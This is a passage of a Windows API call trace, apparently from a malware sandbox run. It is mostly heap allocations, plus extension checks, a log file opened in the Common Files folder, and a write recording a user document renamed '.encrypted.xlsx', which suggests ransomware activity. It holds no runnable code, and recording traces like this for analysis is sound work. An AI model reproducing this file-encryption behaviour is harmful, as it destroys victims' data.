dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.564] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.565] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.566] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0032.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.567] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0032.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x120) returned 0x7c5448 [0032.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0032.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.568] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.568] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.568] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0032.568] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.569] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.569] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0032.569] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xcba, lpOverlapped=0x0) returned 1 [0032.569] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0032.569] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xcba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.569] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.encrypted.xlsx\r\n", cchWideChar=77, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0032.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4d) returned 0x7f36e0 [0032.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.encrypted.xlsx\r\n", cchWideChar=77, lpMultiByteStr=0x7f36e0, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.encrypted.xlsx\r\n", lpUsedDefaultChar=0x0) returned 77 [0032.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.569] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x4c, lpOverlapped=0x0) returned 1 [0032.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.569] CloseHandle (hObject=0x140) returned 1 [0032.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.571] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0032.571] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 